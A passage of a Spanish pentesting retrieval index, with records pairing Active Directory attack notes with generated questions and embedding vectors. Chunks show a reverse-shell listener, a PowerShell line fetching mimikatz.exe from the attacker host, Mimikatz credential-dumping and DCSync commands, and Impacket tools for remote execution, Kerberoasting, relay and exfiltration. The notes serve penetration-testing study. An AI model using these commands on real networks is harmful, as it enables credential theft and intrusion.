0.06338, 0.0222, -0.04261, -0.00569, 0.07193, -0.03076, 0.00462, 0.0805, 0.0376, -0.07492, -0.0923, -0.01653, -0.01694, -0.07584, 0.04966, -0.07924, -0.0925, -0.05952, -0.01327, -0.03019, 0.0173, 0.02967, -0.0395, 0.01161, 0.02096, 0.01866, 0.00064, -0.03576, -0.0305]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ TU KALI/DEBIAN β”‚ β”‚ VICTIMA WINDOWS β”‚\n β”‚ (la atacante) β”‚ β”‚ (cliente o servidor) β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€\n β”‚ β”‚ β”‚ β”‚\n β”‚ β”Œβ”€ Impacket ─────────────┐ β”‚ β”‚ β”Œβ”€ Procesos a saquear ─┐ β”‚\n β”‚ β”‚ secretsdump (hashes) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ LSASS (creds en RAM) β”‚ β”‚\n β”‚ β”‚ psexec (shell) β”œβ”€β”€β”Όβ”€SMB─┼─── NTDS.dit (BD usuarios)β”‚ β”‚\n β”‚ β”‚ GetUserSPNs (kerb) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ SAM/SYSTEM β”‚ β”‚\n β”‚ β”‚ getTGT (kerb) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β”‚ β”‚ β”‚ β”Œβ”€ Lo que SUBES tΓΊ ────┐ β”‚\n β”‚ β”Œβ”€ BloodHound ───────────┐ β”‚ β”‚ β”‚ mimikatz.exe β”‚ β”‚\n β”‚ β”‚ sharphound (recolecta) β”œβ”€β”€β”Όβ”€LDAP┼─── winPEAS β”‚ β”‚\n β”‚ β”‚ neo4j + GUI (visualiza)β”‚ β”‚ β”‚ β”‚ Invoke-ConPtyShell.ps1β”‚ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ Invoke-PowerShellTcp β”‚ β”‚\n β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β”Œβ”€ Listener / loot ──────┐ β”‚ β”‚ β”‚\n β”‚ β”‚ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell β”‚\n β”‚ β”‚ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools β”‚\n β”‚ β”‚ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "existe alguna alternativa libre a BloodHound o Sharphound para analizar las relaciones LDAP?", "v": [-0.29882, 0.03823, -0.0429, -0.04832, -0.1934, -0.00239, -0.01497, -0.04666, -0.15853, 0.12209, 0.03461, -0.17343, 0.00144, 0.0258, 0.09098, -0.03092, -0.06419, -0.08168, -0.01325, -0.02473, 0.00131, 0.00839, -0.1616, -0.03187, -0.03766, -0.10377, 0.01499, 0.06799, -0.01425, 0.0398, -0.07453, 0.00233, 0.02411, 0.14502, -0.10782, 0.05292, 0.03638, 0.05274, 0.07646, 0.11709, 0.10405, -0.06217, 0.00117, -0.09385, 0.06727, 0.03233, -0.17373, 0.07728, 0.01116, 0.13181, -0.02838, 0.14385, -0.19151, -0.06544, 0.06556, 0.02106, 0.05892, -0.12026, 0.05791, -0.08818, -0.06936, 0.01897, 0.08261, -0.08809, 0.0723, 0.00657, -0.00508, -0.02576, -0.00447, 0.1202, -0.07063, 0.01964, -0.05752, 0.02286, -0.08274, 0.01045, 0.03676, 0.05051, 0.05327, 0.03833, -0.009, -0.01393, 0.00562, 0.0719, -0.08097, -0.05358, 0.13696, -0.05881, 0.05911, 0.10323, 0.06911, 0.05984, -0.05892, 0.10035, 0.04113, -0.11092, -0.07317, -0.00584, 0.06068, 0.0156, 0.06344, 0.07109, -0.13442, 0.0506, 0.00074, -0.00678, -0.00433, 0.01898, 0.02423, 0.03357, -0.01909, 0.09065, 0.00042, -0.02502, -0.06125, -0.09825, 0.07127, 0.08031, 0.01721, -0.01753, -0.04786, 0.01825, 0.01059, -0.01139, -0.11871, -0.04311, 0.00883, 0.01659, 0.01586, 0.11653, -0.07229, 0.04019, -0.09262, -0.14363, -0.0968, -0.02153, 0.02567, 0.02074, 0.06308, -0.09241, -0.03656, 0.02609, -0.00457, -0.00953, -0.02336, -0.03202, -0.01466, -0.01314, 0.01968, 0.01594, -0.02157, -0.00688, -0.00324, 0.05745, 0.0349, -0.01934, -0.00181, -0.04775, -0.04295, 0.05063, -0.00308, -0.04761, -0.0123, 0.01704, 0.02206, 0.1071, -0.06158, 0.01727, -0.05299, -0.04132, 0.01926, 0.04334, 0.00081, -0.00285, 0.04094, -0.06015, 0.04512, -0.12854, -0.02888, -0.01722, 0.09151, 0.0101, -0.09007, -0.00824, 0.03317, 0.01977, -0.01472, 0.0331, 0.00822, -0.03541, 0.00168, 0.02285, 0.05965, -0.05045, -0.00613, -0.00502, 0.04818, -0.08921, -0.01047, 0.0107, -0.03365, -0.04516, 0.00214, 0.02702, 0.01835, 0.02449, -0.0597, 0.03503, -0.05481, 0.00035, -0.00892, 0.00952, 0.00725, -0.01364, -0.02409, -0.00162, 0.02843, -0.01657, -0.01986, 0.0216, 0.02819, -0.01721, 0.02831, 0.02325, -0.02269, 0.04271, 0.02169, 0.00119, 0.04426, -0.01775, -0.00454, 0.04956, -0.00413, 0.01498, -0.05205, 0.02663, 0.01605, -0.02101, 0.04306, -0.02937, 0.10369, 0.00512, -0.02516, -0.01513, -0.06304, -0.06264, -0.01006, -0.01747, -0.01811, -0.02603, 0.01067, 0.03153, -0.00261, 0.01696, 0.04159, 0.00448]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "**Idea clave**: tΓΊ no tienes \"GUI\" central. Cada herramienta es **independiente** y se comunica por **red** con la vΓ­ctima. Tu Kali es un puesto de mando con muchos terminales abiertos a la vez.\n\n---", "indexar": "quΓ© programa me permite tener mΓΊltiples herramientas independientes conectadas entre sΓ­ sin una interfaz grΓ‘fica central?", "v": [0.02369, 0.13398, -0.14644, -0.15162, 0.07605, -0.11314, -0.1367, -0.04786, -0.06651, -0.05493, 0.04851, 0.00342, -0.04295, -0.12215, 0.15764, 0.07836, -0.00939, -0.15278, 0.07058, -0.07095, 0.00822, 0.02276, -0.03702, -0.14042, -0.09229, -0.02396, 0.08658, -0.07037, -0.06639, -0.00587, -0.02326, -0.03488, 0.13997, -0.0487, -0.0884, -0.15633, -0.06127, 0.06471, 0.04716, -0.12719, 0.04528, 0.00039, -0.094, 0.0397, 0.18495, -0.03936, -0.0444, 0.03872, 0.00929, 0.02084, -0.10389, -0.14389, -0.05778, 0.0267, 0.00512, -0.16561, 0.12037, -0.07311, -0.00709, 0.02469, -0.02336, 0.14363, 0.02559, 0.00549, 0.05822, -0.00146, -0.02137, -0.11748, 0.00615, 0.11406, 0.0566, 0.06305, 0.02834, -0.07238, 0.07547, 0.04222, -0.05986, -0.06949, 0.14161, 0.016, 0.0617, -0.00287, 0.03401, 0.05, -0.02519, -0.06984, 0.03881, -0.02766, -0.04031, -0.02055, 0.03548, 0.01581, -0.01412, 0.02198, 0.07581, -0.0253, 0.02257, 0.01043, 0.0558, -0.02608, 0.10418, -0.00966, -0.13347, 0.06163, -0.06538, -0.021, 0.0355, 0.00247, -0.08325, 0.02817, 0.03693, 0.09234, 0.03475, 0.01188, -0.0824, 0.05785, -0.01218, -0.01907, 0.00324, -0.12573, -0.02323, 0.04004, 0.0057, 0.02494, 0.0445, -0.05864, -0.02065, 0.12265, 0.00551, 0.05547, -0.03374, -0.03312, -0.03231, -0.13695, -0.07431, -0.08928, -0.00857, -0.09273, 0.02488, -0.10497, 0.00314, 0.03901, 0.034, -0.10035, 0.01761, 0.0305, 0.02828, -0.0743, -0.05356, 0.03763, -0.06852, -0.01661, 0.00609, 0.04821, -0.02108, -0.00694, -0.02649, -0.04505, -0.09325, 0.01237, -0.04313, 0.01274, -0.01458, 0.01035, 0.06464, -0.04345, -0.04729, 0.05801, 0.0584, 0.10327, -0.04022, 0.087, 0.04152, -0.02329, 0.0251, -0.01251, -0.02326, -0.04641, -0.01407, -0.0471, -0.03338, 0.02153, -0.00457, -0.04221, -0.04267, -0.01614, -0.06783, -0.01685, 0.06107, 0.01339, -0.06265, 0.05571, -0.05117, 0.00733, 0.10374, -0.04539, -0.01254, 0.00017, -0.0188, 0.0062, -0.04458, 0.01401, 0.02605, -0.01779, 0.07201, 0.12654, -0.08328, 0.02187, 0.03481, 0.07039, 0.01842, -0.02804, 0.08431, -0.07847, 0.00363, -0.03808, 0.00786, -0.0002, 0.06682, -0.02673, 0.01263, -0.01418, 0.03731, 0.023, -0.00151, -0.02829, -0.01949, 0.05981, 0.01878, 0.01023, -0.019, 0.00022, -0.01914, -0.01482, 0.00364, -0.02591, 0.00693, -0.04437, -0.00497, -0.09312, 0.00312, 0.07969, -0.03455, 0.00851, -0.00882, -0.05874, -0.06145, -0.03307, 0.00768, -0.02789, -0.05545, 0.08064, 0.09236, -0.02105, 0.02824, 0.00709]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "**Idea clave**: tΓΊ no tienes \"GUI\" central. Cada herramienta es **independiente** y se comunica por **red** con la vΓ­ctima. Tu Kali es un puesto de mando con muchos terminales abiertos a la vez.\n\n---", "indexar": "con quΓ© herramienta puedo gestionar varios terminales abiertos que se comuniquen en red para coordinar mi ataque?", "v": [0.00924, 0.11622, -0.1132, -0.2029, 0.01761, -0.10092, -0.0058, 0.08267, -0.11175, -0.07679, -0.18935, -0.04619, 0.05227, -0.06204, 0.19461, 0.03263, 0.07998, -0.06798, 0.11877, -0.07349, -0.06297, -0.01062, 0.01067, 0.03115, -0.02175, -0.001, 0.08016, -0.07091, -0.05636, -0.10391, 0.07155, -0.02888, 0.12243, -0.05172, -0.0494, 0.03305, -0.07511, 0.11476, 0.03047, 0.02596, -0.08513, -0.02463, -0.18738, -0.06387, 0.13771, -0.05832, 0.0387, -0.04475, 0.05154, 0.00318, -0.0623, -0.06502, -0.17062, -0.08658, -0.02947, -0.06439, 0.16879, -0.09021, 0.04623, -0.05163, -0.06577, -0.00917, -0.01431, 0.06053, 0.06993, -0.03972, 0.02677, 0.02862, -0.11697, 0.13407, -0.00687, 0.0888, -0.04004, 0.08296, 0.04481, 0.03195, 0.01188, 0.07746, 0.04916, 0.02563, 0.05105, 0.00976, -0.04844, -0.02027, -0.06701, -0.10896, -0.00681, -0.0479, -0.06059, -0.00442, 0.07172, -0.02502, -0.06182, -0.06755, -0.02045, 0.02995, 0.02279, -0.02174, -0.09124, 0.01659, 0.03974, 0.00942, -0.16066, 0.0773, -0.03511, 0.03583, -0.04109, -0.04302, 0.03032, -0.05919, 0.02594, -0.12683, 0.11455, -0.06024, -0.01936, 0.04696, -0.02394, -0.01211, -0.02326, -0.01221, -0.02757, -0.02331, -0.00276, -0.02299, 0.10107, -0.0221, -0.03456, 0.01965, 0.00746, 0.00689, -0.04089, -0.01601, 0.05812, -0.02723, -0.054, 0.09048, 0.01893, -0.15003, 0.0131, -0.05124, -0.07162, 0.06303, -0.00341, -0.05211, 0.07411, 0.03761, -0.02628, -0.01861, -0.04834, 0.02238, 0.0868, -0.07093, -0.02593, 0.03293, -0.03933, 0.04088, 0.02826, 0.00845, -0.11405, 0.09171, -0.10677, -0.04085, -0.10568, 0.00582, 0.02048, -0.02242, -0.01617, -0.0056, 0.06678, -0.04573, 0.03434, 0.00148, 0.02001, 0.00038, -0.00513, -0.15616, -0.05259, -0.07736, 0.03257, -0.07821, 0.01737, 0.00772, -0.03002, -0.00737, -0.01784, -0.00742, -0.04823, 0.05741, 0.0056, 0.01499, -0.01127, 0.02577, 0.06615, -0.03599, 0.10173, -0.06751, 0.01808, -0.0512, -0.05311, 0.02864, -0.02085, 0.04775, 0.00387, -0.01471, 0.04545, 0.06498, -0.06441, 0.04676, 0.02445, 0.08518, 0.00255, 0.03014, 0.0514, 0.02064, -0.07374, -0.02934, 0.00493, 0.04748, 0.02261, -0.00786, 0.08982, -0.01477, 0.01027, 0.00013, 0.02084, 0.01269, -0.02068, -0.04515, 0.04231, 0.01164, -0.00145, -0.05332, 0.01873, -0.00448, 0.00405, -0.05993, 0.07448, 0.01465, -0.04559, 0.01195, -0.00298, 0.05795, 0.01913, -0.0122, -0.08111, -0.0668, -0.05744, 0.00286, -0.04827, -0.08525, -0.00732, 0.05205, 0.0277, -0.02516, 0.02423, -0.00672]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la vΓ­ctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesiΓ³n estΓ‘ activa) y volcarlas.\n\n```\n tΓΊ (Kali) vΓ­ctima Windows\n ───────── ────────────────\n β”‚\n β”‚ 1. Levantas HTTP en tu carpeta de herramientas\n β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ 2. desde β”‚ PowerShell β”‚ iwr http://kali/mimikatz.exe -o m.exe\n β”‚ reverse β”‚ shell β”‚\n β”‚ shell ──► β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ β–Ό\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚ m.exe β”‚ privilege::debug\n β”‚ β”‚ β”‚ sekurlsa::logonpasswords\n β”‚ 4. ves ◄──── vuelca creds β”‚ lsadump::sam\n β”‚ hashes β”‚ del LSASS β”‚ lsadump::dcsync /user:Administrator\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "que programa lee las credenciales en memoria de Windows ejecutΓ‘ndose desde fuera?", "v": [-0.18298, 0.06894, -0.03096, -0.08636, 0.0927, 0.01836, -0.01651, 0.00273, -0.05834, -0.19731, -0.04771, 0.06941, -0.04822, -0.07284, -0.02129, 0.08632, 0.11945, 0.05833, 0.01154, 0.00487, -0.07255, -0.10488, 0.0163, 0.05817, -0.02064, 0.0559, -0.01643, 0.0504, 0.02192, -0.00547, 0.05465, 0.06232, 0.05466, -0.13834, 0.07657, 0.07123, -0.04075, 0.00914, -0.02179, 0.08799, 0.03093, 0.09014, -0.03444, 0.0677, 0.09889, -0.04611, 0.04418, -0.00724, 0.05297, -0.07029, -0.02842, -0.01657, 0.05792, -0.05913, 0.12813, -0.08611, 0.06212, -0.06751, -0.02445, -0.00533, -0.016, 0.08489, 0.05758, 0.02273, 0.12428, 0.08406, 0.09451, -0.05883, 0.00919, 0.14372, -0.15444, -0.00324, 0.05664, -0.02012, 0.01274, -0.01425, -0.0506, 0.03284, 0.06786, 0.00409, -0.01126, -0.05837, 0.05826, 0.00029, 0.02489, -0.00597, -0.06335, -0.00561, -0.00485, -0.0477, 0.07204, 0.05906, -0.10472, 0.22696, 0.08789, -0.08333, 0.07107, 0.04625, 0.08193, 0.12359, 0.00219, -0.09159, -0.07635, 0.12259, 0.03573, 0.10543, 0.00939, -0.03885, -0.08191, -0.01153, 0.04506, 0.00414, -0.07548, -0.0001, -0.09431, 0.0269, 0.022, -0.05755, 0.06773, 0.00228, -0.05728, -0.08378, -0.04273, -0.0224, 0.01651, -0.03484, -0.13036, 0.10185, -0.11283, 0.06794, -0.00471, 0.09247, 0.02659, -0.07673, -0.08191, 0.02762, -0.00165, 0.03504, 0.01558, -0.07315, 0.13005, 0.08346, 0.02635, -0.01069, -0.04075, 0.03826, 0.04807, 0.03247, -0.01296, -0.01645, 0.05769, 0.03056, -0.00152, 0.05453, -0.03987, -0.00064, 0.05645, 0.04857, -0.03201, 0.03551, -0.10339, -0.00089, -0.01734, -0.01042, 0.07309, -0.06003, -0.03745, 0.05977, 0.11521, 0.06559, -0.04137, 0.00785, -0.06211, -0.07574, 0.01401, -0.02594, -0.02207, -0.06635, 0.01429, 0.01589, -0.1125, 0.02564, 0.046, -0.0055, -0.07973, -0.02761, -0.04357, 0.05681, -0.02397, -0.00837, -0.01269, -0.0058, 0.0799, -0.02275, 0.01097, -0.07092, -0.05949, 0.00621, 0.06394, 0.01787, -0.10722, 0.05586, -0.00378, -0.00768, 0.08458, 0.09321, -0.03101, 0.06941, 0.02175, 0.10416, 0.00593, -0.03459, 0.02773, -0.02843, -0.06513, -0.08343, 0.02073, 0.00025, 0.0028, -0.00298, 0.03045, 0.01824, 0.08158, 0.02772, -0.08557, -0.08346, -0.0033, 0.04399, -0.00134, -0.01659, -0.0357, 0.02889, -0.00916, -0.05096, 0.0623, 0.00666, -0.01249, -0.0726, -0.02707, -0.05028, -0.07056, 0.0651, -0.08656, -0.06758, -0.09102, -0.0097, -0.02545, 0.04179, 0.06307, -0.03616, -0.02718, 0.06895, 0.0582, -0.05091, 0.01623, 0.02173]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la vΓ­ctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesiΓ³n estΓ‘ activa) y volcarlas.\n\n```\n tΓΊ (Kali) vΓ­ctima Windows\n ───────── ────────────────\n β”‚\n β”‚ 1. Levantas HTTP en tu carpeta de herramientas\n β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ 2. desde β”‚ PowerShell β”‚ iwr http://kali/mimikatz.exe -o m.exe\n β”‚ reverse β”‚ shell β”‚\n β”‚ shell ──► β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ β–Ό\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚ m.exe β”‚ privilege::debug\n β”‚ β”‚ β”‚ sekurlsa::logonpasswords\n β”‚ 4. ves ◄──── vuelca creds β”‚ lsadump::sam\n β”‚ hashes β”‚ del LSASS β”‚ lsadump::dcsync /user:Administrator\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con que herramienta puedo volcar los hashes de autenticaciΓ³n de LSASS en una vΓ­ctima?", "v": [-0.01323, -0.04987, -0.08785, -0.00743, -0.08144, -0.08582, -0.13174, -0.07082, -0.02342, 0.16504, -0.0361, -0.10123, -0.02014, 0.11183, 0.14053, 0.02821, 0.07994, -0.06947, -0.04572, 0.13489, 0.01004, -0.09522, -0.20626, 0.01056, -0.04412, -0.00464, 0.01137, 0.08092, -0.21058, 0.02756, -0.10696, -0.02436, -0.17591, 0.06803, 0.01788, -0.05044, -0.18163, 0.13525, 0.12082, 0.09951, 0.15313, 0.09318, -0.07642, 0.00743, 0.04119, -0.08429, -0.08699, 0.03209, 0.04255, 0.05351, 0.01986, -0.13482, -0.24723, -0.06357, -0.03067, -0.11915, 0.14799, -0.04589, -0.00979, -0.06347, -0.04946, -0.01515, -0.04973, 0.01307, 0.02041, -0.07089, 0.14564, -0.02017, 0.00704, 0.04062, 0.01563, 0.04656, 0.02889, -0.02758, -0.03945, -0.05796, -0.00427, 0.06027, 0.05555, 0.0173, 0.06311, -0.04998, -0.03714, 0.07994, -0.02707, 0.05163, 0.06747, -0.07152, 0.10361, -0.09933, 0.0228, 0.04238, 0.03744, 0.03992, -0.00399, -0.05391, 0.04458, -0.09113, 0.0029, -0.09868, 0.11579, -0.108, -0.01388, 0.07448, 0.05023, -0.05147, -0.05929, 0.04423, -0.05077, 0.01153, 0.04037, 0.03195, -0.01273, 0.00143, -0.06129, 0.01132, -0.04162, 0.00731, 0.06262, -0.01608, 0.0616, 0.02103, 0.05378, -0.0511, 0.05672, 0.03364, -0.1068, 0.04788, 0.00039, -0.05673, 0.05151, 0.02639, -0.04091, 0.02749, 0.09793, 0.02347, 0.04877, -0.09996, 0.02989, -0.02621, 0.04804, 0.04416, -0.01084, -0.07857, -0.00632, -0.05528, -0.0908, -0.03443, -0.04678, -0.00857, 0.08054, -0.01195, 0.03146, 0.03193, -0.08197, 0.01157, -0.03046, 0.01923, -0.03538, 0.05019, -0.03979, 0.00325, 0.00679, 0.03799, -0.03142, -0.05257, 0.07532, -0.04259, 0.08115, 0.05144, 0.06298, -0.03685, 0.07406, 0.01695, 0.00026, -0.11507, 0.01029, -0.00862, -0.0616, -0.07274, -0.00087, -0.02747, -0.04149, -0.01394, 0.0577, -0.0169, -0.03537, 0.01137, -0.03356, -0.00558, 0.00232, 0.04705, -0.00614, 0.00556, 0.0095, 0.01955, 0.01154, 0.02795, 0.00199, -0.0045, -0.09793, -0.01163, 0.01684, -0.04749, 0.04762, 0.03603, -0.00542, -0.04589, -0.04549, -0.02251, 0.03109, 0.02666, 0.049, -0.06301, -0.02422, -0.023, 0.00648, 0.02482, -0.00244, 0.0372, -0.01528, 0.00252, 0.072, -0.01394, 0.00345, 0.01184, -0.01051, 0.06553, -0.00622, -0.04736, 0.00673, 0.00066, -0.01559, -0.02259, 0.03781, -0.01247, 0.03384, 0.00026, -0.07378, -0.00747, 0.00526, 0.03326, -0.0015, 0.00441, 0.00421, 0.00075, -0.02529, 0.01323, -0.0031, -0.05268, -0.02085, -0.00215, 0.0652, -0.06438, -0.0051, -0.05992]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la vΓ­ctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesiΓ³n estΓ‘ activa) y volcarlas.\n\n```\n tΓΊ (Kali) vΓ­ctima Windows\n ───────── ────────────────\n β”‚\n β”‚ 1. Levantas HTTP en tu carpeta de herramientas\n β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ 2. desde β”‚ PowerShell β”‚ iwr http://kali/mimikatz.exe -o m.exe\n β”‚ reverse β”‚ shell β”‚\n β”‚ shell ──► β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ β–Ό\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚ m.exe β”‚ privilege::debug\n β”‚ β”‚ β”‚ sekurlsa::logonpasswords\n β”‚ 4. ves ◄──── vuelca creds β”‚ lsadump::sam\n β”‚ hashes β”‚ del LSASS β”‚ lsadump::dcsync /user:Administrator\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "como se usa mimikatz para extraer contraseΓ±as y claves del registro mediante un shell reverse?", "v": [0.22881, -0.05807, -0.10548, -0.13071, 0.03819, -0.04162, -0.23011, -0.08746, -0.00625, -0.12654, -0.06693, 0.09092, 0.01782, -0.06954, 0.1504, -0.00276, 0.09558, -0.00038, 0.04307, -0.01528, 0.02727, -0.12773, -0.00985, -0.03992, -0.09975, 0.01961, 0.08148, 0.07236, -0.10372, 0.00703, -0.05702, -0.00769, 0.06054, -0.04006, -0.01516, 0.15282, 0.0117, 0.03072, 0.05839, 0.10666, -0.0172, 0.06857, -0.20204, 0.15235, 0.01598, -0.01485, 0.02378, 0.10451, 0.05317, 0.02065, -0.06925, -0.11042, -0.1454, -0.02827, 0.00626, -0.0851, 0.1024, -0.02275, -0.01603, -0.04337, -0.15559, 0.06513, -0.04415, 0.10276, -0.07461, -0.0919, 0.03231, -0.08048, -0.10052, 0.07226, 0.02764, 0.00585, 0.04026, -0.01373, -0.01399, 0.0059, 0.06842, -0.0722, -0.02527, 0.06997, -0.14238, -0.08238, -0.02247, 0.02949, -0.08318, 0.01238, 0.05136, -0.04208, -0.00892, 0.00637, 0.09656, -0.01881, 0.03863, -0.01986, 0.00558, -0.09697, -0.10562, 0.02254, -0.04953, 0.00077, 0.03588, 0.03282, -0.04472, 0.17379, -0.0272, 0.04845, -0.02668, -0.06147, 0.04718, 0.01479, -0.02886, -0.02487, -0.06033, -0.06989, -0.05837, 0.04001, -0.00041, -0.05904, 0.02712, -0.02314, -0.03469, -0.03017, 0.02514, -0.01895, -0.06537, 0.01355, -0.08193, 0.00954, 0.01186, -0.03261, 0.00187, -0.00497, -0.05156, 0.02245, 0.07521, 0.11035, 0.07108, -0.06257, -0.0604, -0.03593, -0.0155, 0.00608, -0.00822, 0.00032, 0.09623, -0.02269, 0.06583, -0.07765, -0.10318, 0.00665, -0.03542, 0.05965, 0.05381, 0.02147, 0.00943, 0.03099, -0.07142, -0.04481, -0.05362, 0.03912, -0.04654, -0.06256, -0.04204, 0.02581, -0.02247, -0.02583, -0.13292, -0.0049, 0.035, 0.01751, 0.0343, 0.02302, 0.07106, -0.00135, 0.02376, 0.06901, -0.02095, -0.05812, -0.01092, -0.06854, -0.00414, -0.01514, 0.0182, -0.01911, -0.01123, -0.086, 0.07387, 0.05768, -0.0421, 0.00925, 0.03539, 0.01748, -0.04131, 0.00471, -0.02843, -0.01884, -0.00409, -0.06735, 0.0174, -0.04225, 0.01992, 0.00659, 0.04168, -0.0509, 0.01281, 0.08045, -0.10675, -0.02877, 0.00148, -0.0214, 0.09918, -0.01178, 0.02481, 0.01867, -0.02314, 0.00889, -0.09412, 0.01537, -0.04494, -0.01599, 0.00286, 0.02613, 0.04405, 0.06783, -0.01336, -0.02654, 0.02212, 0.07864, 0.0458, 0.04835, -0.04973, 0.07003, -0.00254, -0.00145, 0.04152, 0.01466, -0.02147, -0.05986, -0.01304, -0.0657, -0.03055, 0.01756, -0.03113, -0.08198, -0.05158, 0.01609, -0.07664, 0.08294, 0.0498, -0.0214, 0.01346, -0.01745, 0.01758, -0.00153, 0.02122, -0.10203]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos mΓ‘s ΓΊtiles:\n\n```\nimpacket-psexec β†’ te da shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutas comandos sin tocar disco\nimpacket-smbexec β†’ otra forma de ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs β†’ ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers β†’ ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT β†’ forja/pide un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx β†’ relay attacks NTLM\n```", "indexar": "que 